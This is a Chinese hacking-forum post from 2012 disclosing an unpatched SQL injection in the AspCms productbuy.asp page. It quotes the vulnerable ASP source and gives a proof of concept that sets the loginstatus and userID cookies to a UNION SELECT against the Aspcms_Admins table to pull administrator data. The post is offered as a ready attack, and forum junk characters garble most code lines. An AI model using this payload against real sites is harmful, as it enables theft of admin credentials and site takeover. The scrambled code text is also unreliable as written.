好久没上土司了,上来一看发现在删号名单内.....
8 H+ C* F' A3 \8 l也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
3 s" M7 T% I" T废话不多说,看代码:
6 o7 f7 l3 d- s) z# J' F7 q. ]5 ? ?5 _+ r0 f
<%
8 L+ S' O2 H: Y6 R E; h* e' F( } O8 }& b% v
if action = "buy" then
1 q3 \+ q$ b& P3 z" i8 Y9 G: w# p4 b
* q4 a0 h% D7 W. g) x- i addOrder()
$ W$ E+ T( _8 n! N6 D4 b
" d& V$ n+ e7 H) g/ X/ `" p; Velse4 {+ C! p3 _. s% D
' e9 @1 A* l. j# C# o* F1 v echoContent()* Q6 L# `# n/ ~
" H9 s: O4 P* b/ d. I
end if
) |, C' p- h; s3 z. r r. h# s
* P: b2 |0 T7 I# [5 s' q4 ]' p: G9 D
' ^' [$ b9 k$ r2 ?% d: T……略过 ?) c9 ~1 g+ p% P( b
4 E7 O! h; Z. x& |7 M A
% {; C' q; U) A6 L* D, V: `2 L$ `" {- ?+ h
Sub echoContent()/ @4 Y! M( y" f
) t! z* y* p7 a. J' A& x6 F/ [3 d
dim id5 c7 `3 m% S) ^% B: _" E
8 d, f0 j, k* V+ | id=getForm("id","get")! s$ c( V5 N! T1 `0 ]! {
; N, A& X3 K1 W- l/ c6 S# O
) U. T3 y$ j. d! l+ }; i1 \( E5 Z" Y9 W! p. t, _: h# @
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
( Y) D) r7 \: B# Z9 `" `8 b# _2 d( F7 D+ r" w" {9 z& Z6 n
- Y7 F7 J- ~' R/ r9 s! D
8 c/ ~# `( K6 ?2 z
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
% N$ t/ C/ @1 q' X7 G* ~, z* G$ h0 s8 e
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct$ o; o; V5 P# l" { n( I- I4 R
& d* z0 i9 V F( ~# h Dim templatePath,tempStr% D% p5 B3 o' I) f5 i/ M
, V) l2 ^ ], B& l( @0 [ o* _ templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
( }0 |9 Y( B5 w
1 J' S8 j2 |) l; h' }1 C, a
( i4 U! f2 r! A- m4 u4 ~. L8 }1 W' s9 V& [9 {: |0 ~$ A, M
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
1 P/ [" v/ M \8 Y" g% ]; o) P0 `. A# z
6 o; ^$ j) {5 i' ~4 c selectproduct=rsObj(0)
' B- o2 E3 _" ~* N5 ^. O5 c, g5 ]6 q& x, h9 t' ?( f7 Y2 J# f' P' @# D
) @" k% w0 ]. v9 p# d( a
5 L" C- e u* A/ H Dim linkman,gender,phone,mobile,email,qq,address,postcode
% @4 K: b7 X$ u5 T9 l. q, z# h7 N* Q
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0. R2 A7 @- ]: M0 W& k
* O3 W. S! o; ]' A0 U if rCookie("loginstatus")=1 then 7 {6 Y6 x \/ W+ \' c7 p4 {: y
$ D2 H* ^3 j) U; O9 h' @, w set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")* _& G& }2 O) P' Y! d
1 m" `5 @; |& w+ p( u0 f
linkman=rsObj("truename")
' C9 Y) e8 l/ C, }* W6 n$ V# h6 D2 w/ R E! z" x& Z1 ]
gender=rsObj("gender") E5 ?& z0 Y# d+ e+ U
) G7 L0 [( m( |+ I& k6 g phone=rsObj("phone")
& ~ l! p7 g: K1 K6 l8 N& s7 R: b
mobile=rsObj("mobile")9 Y& L) A5 j) V5 ?' U+ D
" i* y! [* t6 H: j
email=rsObj("email")1 [3 @1 S2 P$ Q* a5 u
9 W& Y. X/ @/ t# S U2 F% z
qq=rsObj("qq")/ A6 s+ n9 v7 P
8 k* f& t' p* z0 s) }6 R$ h/ }
address=rsObj("address"): k4 z$ H5 U# ^/ y1 k; f
+ }2 r) t1 X; E/ |% y5 ` postcode=rsObj("postcode")% H7 {3 b$ `0 C6 L! R W' o
4 a2 r$ ~" v) t else ) P0 ?9 h4 Q7 T' _( A" u
9 p2 ^+ \( J0 I) D& e% r gender=1
4 T/ j& k' z9 X7 E
2 b5 \- M0 y/ F9 V7 V0 ` end if7 P, f/ q" B# n% O; ]7 s
, Q$ W: P" E. T/ R) D4 Y+ u rsObj.close()
5 b; K8 K( q0 v6 j, z3 t& U( k3 ~- X8 A* a; Z C. e
- x6 \" z; K1 c" N% y: q) u( z1 f) n: K3 j0 m$ ~( y
with templateObj
# ~9 f2 ]2 }- _* h9 j0 n) x8 U/ ~
8 ~( n6 A, W) T: o* V" n/ E4 D2 k .content=loadFile(templatePath)
5 B% { Z4 k/ C7 c) \7 F* _ [9 e0 G6 s* l, N
.parseHtml()
; L5 P" J! {4 R" Z. z" r
% [0 ^) X& g6 U7 R f .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
1 L3 s; k( x6 A6 u5 X1 T7 M) b3 q+ u
.content=replaceStr(.content,"[aspcms:linkman]",linkman) ! q s( m0 ~ d6 j8 Y5 @
- j( ? o% h- g
.content=replaceStr(.content,"[aspcms:gender]",gender)
1 k" K/ {" C# `! k# D, U0 I4 Z+ I5 c2 g
: W9 P% s! S9 {+ Q* F3 P8 H% @ .content=replaceStr(.content,"[aspcms:phone]",phone) % I t9 {# a' r+ b+ A, _' ~
/ I0 ^) ~7 r) k7 ^3 C
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
- ], [- C$ k& i. U$ z
* s P2 l" V! A) |+ d* v .content=replaceStr(.content,"[aspcms:email]",email) 2 W1 w: f- I2 Q/ D. E! M
2 `/ ]( b& {- J* g2 A* ^ .content=replaceStr(.content,"[aspcms:qq]",qq)
/ y2 S$ w7 F6 S4 P
& H) @: d" J; c, ]% m7 S .content=replaceStr(.content,"[aspcms:address]",address) ; A3 B7 a5 S% b7 u6 W6 E
$ F5 V& \& b- R .content=replaceStr(.content,"[aspcms:postcode]",postcode)
; ^/ J* ~ g" Y( A+ n* D% `2 B$ l% j
.parseCommon()
0 r' {( R7 |/ S6 A% ]( @; ]# G5 q# a
3 L2 b, C5 }1 `9 F" D. t* m echo .content + j' @+ y# N& h( o5 ^2 _
7 F$ |' U- d+ n( u9 S end with+ t$ e5 m- s8 \6 c$ G, z2 R$ G
( k& }* V9 w( G$ M7 f7 s) x
set templateobj =nothing : terminateAllObjects$ ^- ~! I# ~% Y# M! \
i8 C3 g! z6 `- X5 P
End Sub1 d" I& U3 G( s7 K
漏洞很明显,没啥好说的# f* H- e- e, J2 e* V' B
poc:0 b0 N1 Q# I$ e+ [- {
, |) \* f" H8 n3 h: X1 y# V E$ S: d
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
- A% y9 I% R$ O( y5 ~6 ?$ ]
% M, s# Q+ c2 T7 X |
发表于 2012-12-27 08:35:05
收藏
支持
反对